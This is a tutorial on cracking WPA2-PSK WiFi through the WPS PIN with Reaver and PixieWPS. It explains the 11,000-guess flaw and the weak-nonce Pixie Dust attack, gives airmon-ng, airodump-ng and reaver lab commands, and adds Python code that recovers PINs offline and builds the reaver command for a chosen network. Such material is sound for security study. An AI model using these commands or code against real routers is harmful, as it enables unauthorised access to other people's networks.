Reaver is a tool to brute-force the WPS PIN of a WiFi router. PixieWPS is a newer tool that brute-forces the PIN offline, from the keys and hashes exchanged during a WPS transaction.

WPS (Wi-Fi Protected Setup) is designed to quickly and easily authenticate a client to an AP and is mainly aimed at home users. In WPS the Access Point and the client exchange a series of EAP messages (M1 to M8), during which the client proves that it knows the 8-digit WPS PIN.

The PIN is not verified as a whole. The eighth digit is a checksum over the first seven, and the AP confirms the first four digits separately from the last three. So the first half leaves 10^4 = 10,000 guesses and the second half leaves 10^3 = 1,000 guesses, a total of only 11,000 guesses where a full 8-digit PIN should need 10^8 = 100,000,000. This drastic reduction in the number of guesses means the PIN can be brute-forced in hours rather than years. Reaver is a tool which does exactly that: an online attack on a WPS-enabled AP, trying out at most about 11,000 PINs.

Recently, a newer flaw was discovered by a security researcher named Dominique Bongard. The two halves of the PIN are proven with two hashes (E-Hash1 and E-Hash2) that also cover two secret nonces (E-S1 and E-S2) chosen by the AP. He discovered that on many devices these nonces are not properly randomized (some chipsets use all-zero nonces, others a weak PRNG whose output can be recovered from the public E-Nonce), so the values captured during a single exchange with Reaver are enough to brute-force the real PIN offline, without further interaction with the AP.

PixieWPS is the tool which finds the WPS PIN from the captured hashes. Candidate PINs are tested against the received E-Hash1 and E-Hash2, which confirms the real PIN. Then this PIN can be used by Reaver to perform a single online attack against the router to get the real WPA passphrase. This attack is only applicable to vulnerable devices; an AP that randomizes E-S1 and E-S2 properly is not affected. PixieWPS can be executed alone or through the updated reaver package.

References: Wiki, HTG, Infosec Institute

Options

Since this tutorial focuses on reaver, only reaver options are shown.

-i, --interface=<wlan>      Name of the monitor-mode interface to use
-c, --channel=<channel>     Set the 802.11 channel for the interface (implies -f)
-o, --out-file=<file>       Send output to a log file
-a, --auto                  Auto detect the best advanced options for the target AP
-v, --verbose               Display non-critical warnings (-vv for more)
-q, --quiet                 Only display critical messages
-K, --pixie-dust=<number>   Run pixiewps with PKE, PKR, E-Hash1, E-Hash2 and E-Nonce (Ralink, Broadcom, Realtek)
-Z, --no-auto-pass          Do NOT run reaver to auto retrieve WPA password if Pixiewps attack is successful
-p, --pin=<wps pin>         Use the specified 4 or 8 digit WPS pin
-d, --delay=<seconds>       Set the delay between pin attempts
-l, --lock-delay=<seconds>  Set the time to wait if the AP locks WPS pin attempts
-1, --p1-index              Set initial array index for the first half of the pin
-2, --p2-index              Set initial array index for the second half of the pin
-P, --pixiedust-loop        Set into PixieLoop mode (doesn't send M4, and loops through to M3)
-W, --generate-pin          Default Pin Generator by devttys0 team [1] Belkin [2] D-Link

Lab : Crack WPA2 PSK network With Reaver & PixieWPS

Scenario
Attacker – Kali Linux (Sana) machine (not a VM)

Reaver Initial Setup

Command: airmon-ng check
airmon-ng check lists the processes (network managers, wpa_supplicant and the like) that can interfere with monitor mode. Kill them and run the check again; do this repeatedly for all processes until airmon-ng check gives "no interfering" output.

Command: airmon-ng start wlan0
Start the monitor interface in order to capture packets from the air. The new monitor interface is named wlan0mon, which is the name used in the commands below.

[Figure: Reaver Initial Setup]

Starting Capture

Airodump dumps the packets received on the monitor interface. We can choose whether or not to write the packets to a file. A full tutorial on this will be coming in the near future.

Command: airodump-ng wlan0mon

Executing airodump turns the terminal into a continuously updating display that shows all the information about the networks in range.

[Figure: Starting Capture]

From the above figure, we can get the MAC (BSSID) and the channel of our target.

Command: reaver -i wlan0mon -b <BSSID> -c <channel> -K 1 -vv

Here <BSSID> and <channel> stand for the target's MAC address and channel taken from the airodump output. -K 1 runs pixiewps on the captured PKE, PKR, E-Hash1, E-Hash2 and E-Nonce and, unless -Z is given, uses the recovered PIN to retrieve the WPA passphrase.

[Figure: Capture & Reaver Output]
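The two ideas in the introduction, the 10^4 + 10^3 PIN split and the offline Pixie Dust recovery from E-Hash1/E-Hash2, as an added worked example. This is not code from the original page nor from the reaver or pixiewps projects. It uses the WPS hash construction (E-HashN = HMAC-SHA-256(AuthKey, E-SN || PSKN || PKE || PKR), PSKN = first 128 bits of HMAC-SHA-256(AuthKey, PIN half)) and assumes the all-zero E-S1/E-S2 that some vulnerable chipsets use; AuthKey, PKE and PKR are constructed stand-ins, since in a real exchange the attacker, acting as registrar, derives them from the Diffie-Hellman exchange in M1/M2.

```python
import hashlib
import hmac

# --- PIN structure ---------------------------------------------------------
# A WPS PIN is 8 decimal digits: digits 1-4 are the first half, digits 5-7 the
# body of the second half and digit 8 is a checksum over the first seven. The AP
# acknowledges each half separately, which is what shrinks the search space.

def wps_checksum(first7: int) -> int:
    """Checksum digit for the first seven digits of a WPS PIN."""
    acc = 0
    n = first7
    while n:
        acc += 3 * (n % 10)
        n //= 10
        acc += n % 10
        n //= 10
    return (10 - acc % 10) % 10


def full_pin(half1: str, half2_body: str) -> str:
    """Join a 4-digit first half and a 3-digit second-half body, appending the checksum."""
    first7 = int(half1) * 1000 + int(half2_body)
    return f"{first7:07d}{wps_checksum(first7)}"


def online_search_space() -> int:
    """Worst-case number of guesses for an online (reaver-style) attack."""
    return 10 ** 4 + 10 ** 3


# --- Pixie Dust offline recovery -------------------------------------------
# In M3 the AP sends E-Hash1 and E-Hash2. The registrar already knows AuthKey,
# PKE and PKR, so if E-S1/E-S2 are predictable every term except the PIN half
# is known and each half can be brute-forced offline against its own hash.

def derive_psk(authkey: bytes, pin_half: str) -> bytes:
    """PSK1/PSK2: first 128 bits of HMAC-SHA-256(AuthKey, ASCII digits of the half)."""
    return hmac.new(authkey, pin_half.encode("ascii"), hashlib.sha256).digest()[:16]


def e_hash(authkey: bytes, e_s: bytes, psk: bytes, pke: bytes, pkr: bytes) -> bytes:
    return hmac.new(authkey, e_s + psk + pke + pkr, hashlib.sha256).digest()


def pixie_recover_pin(authkey, pke, pkr, e_hash1, e_hash2,
                      e_s1=bytes(16), e_s2=bytes(16)):
    """Recover the PIN offline; defaults assume all-zero nonces (vulnerable AP).

    Returns None when no candidate fits, i.e. the AP randomizes E-S1/E-S2
    properly and the attack does not apply to it.
    """
    half1 = None
    for guess in range(10 ** 4):                      # 10,000 first halves
        cand = f"{guess:04d}"
        if hmac.compare_digest(e_hash(authkey, e_s1, derive_psk(authkey, cand), pke, pkr), e_hash1):
            half1 = cand
            break
    if half1 is None:
        return None
    for guess in range(10 ** 3):                      # 1,000 second halves (checksum fixed)
        pin = full_pin(half1, f"{guess:03d}")
        if hmac.compare_digest(e_hash(authkey, e_s2, derive_psk(authkey, pin[4:]), pke, pkr), e_hash2):
            return pin
    return None


def simulate_ap_m3(authkey, pke, pkr, pin, e_s1, e_s2):
    """Constructed stand-in for the enrollee: the E-Hash1/E-Hash2 it would send in M3."""
    return (e_hash(authkey, e_s1, derive_psk(authkey, pin[:4]), pke, pkr),
            e_hash(authkey, e_s2, derive_psk(authkey, pin[4:]), pke, pkr))


def demo(pin: str = "12345670", weak_nonces: bool = True):
    # Constructed values: real PKE/PKR are 192-byte DH public keys and AuthKey is
    # derived from the DH shared secret; here they are deterministic bytes.
    authkey = hashlib.sha256(b"demo AuthKey").digest()
    pke = hashlib.sha256(b"demo PKE").digest() * 6
    pkr = hashlib.sha256(b"demo PKR").digest() * 6
    if weak_nonces:
        e_s1 = e_s2 = bytes(16)                                   # vulnerable AP
    else:
        e_s1 = hashlib.sha256(b"unpredictable nonce 1").digest()[:16]  # patched AP
        e_s2 = hashlib.sha256(b"unpredictable nonce 2").digest()[:16]
    eh1, eh2 = simulate_ap_m3(authkey, pke, pkr, pin, e_s1, e_s2)
    return pixie_recover_pin(authkey, pke, pkr, eh1, eh2)


if __name__ == "__main__":
    print("online guesses:", online_search_space())
    print("weak nonces   :", demo())
    print("random nonces :", demo(weak_nonces=False))
```

The whole offline search is 11,000 HMAC computations and finishes in well under a second, which is the point of the attack: the online PIN search that reaver needs hours for collapses once the nonces are predictable. With properly random nonces the same code returns None, matching the page's caveat that only vulnerable devices are affected.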
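The lab procedure (pick the target's BSSID and channel from airodump, feed them to reaver with -K 1 -vv), as an added example that is not part of the original page. It assumes airodump-ng was run with -w and --output-format csv, and the sample CSV below is constructed to match the column layout of that output; parse_access_points, wpa_psk_targets, find_target and reaver_argv are names chosen here. Note that airodump's CSV does not say whether WPS is enabled on an AP (wash does), so the filter below only narrows to WPA/WPA2-PSK networks.

```python
import csv
import io
import shlex

# Constructed sample of airodump-ng's CSV output: AP table, blank line, station table.
AIRODUMP_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
AA:BB:CC:DD:EE:01, 2015-09-04 10:00:00, 2015-09-04 10:05:00,  6,  54, WPA2, CCMP, PSK, -40,  120,  0,   0.  0.  0.  0,   7, TestLab, 
AA:BB:CC:DD:EE:02, 2015-09-04 10:00:01, 2015-09-04 10:05:00, 11,  54, OPN,  ,  , -70,   30,  0,   0.  0.  0.  0,   4, Cafe, 
AA:BB:CC:DD:EE:03, 2015-09-04 10:00:02, 2015-09-04 10:05:00,  1,  54, WPA2 WPA, CCMP TKIP, PSK, -62,   80,  0,   0.  0.  0.  0,   6, Office, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
11:22:33:44:55:66, 2015-09-04 10:01:00, 2015-09-04 10:04:00, -50,  12, AA:BB:CC:DD:EE:01, TestLab
"""


def parse_access_points(csv_text: str) -> list:
    """Return the AP table rows as dicts keyed by the header names (ESSIDs containing commas are not handled)."""
    aps = []
    header = None
    for row in csv.reader(io.StringIO(csv_text), skipinitialspace=True):
        if not row or not any(cell.strip() for cell in row):
            if header:            # blank line ends the AP table
                break
            continue
        cells = [c.strip() for c in row]
        if cells[0] == "BSSID":
            header = cells
            continue
        if cells[0] == "Station MAC":
            break
        if header and len(cells) >= len(header):
            aps.append(dict(zip(header, cells)))
    return aps


def wpa_psk_targets(aps: list) -> list:
    """WPA/WPA2-PSK networks: the only ones for which a recovered WPS PIN yields a passphrase."""
    return [ap for ap in aps if "WPA" in ap["Privacy"] and ap["Authentication"] == "PSK"]


def find_target(csv_text: str, essid: str):
    """BSSID and channel of the named network, or None if absent or not WPA-PSK."""
    for ap in wpa_psk_targets(parse_access_points(csv_text)):
        if ap["ESSID"] == essid:
            return {"bssid": ap["BSSID"], "channel": int(ap["channel"])}
    return None


def reaver_argv(iface: str, bssid: str, channel: int, pixie_dust: int = 1) -> list:
    """argv for the tutorial's command: reaver -i <iface> -b <BSSID> -c <channel> -K 1 -vv."""
    return ["reaver", "-i", iface, "-b", bssid, "-c", str(channel), "-K", str(pixie_dust), "-vv"]


if __name__ == "__main__":
    target = find_target(AIRODUMP_CSV, "TestLab")
    # Printed rather than executed: the real run needs root and a monitor-mode interface.
    print(shlex.join(reaver_argv("wlan0mon", target["bssid"], target["channel"])))
```

Looking the target up by ESSID in the CSV instead of copying the MAC by hand from the live airodump screen avoids the usual transcription mistakes, and the same parser works on the CSV written by a capture that was left running for a while.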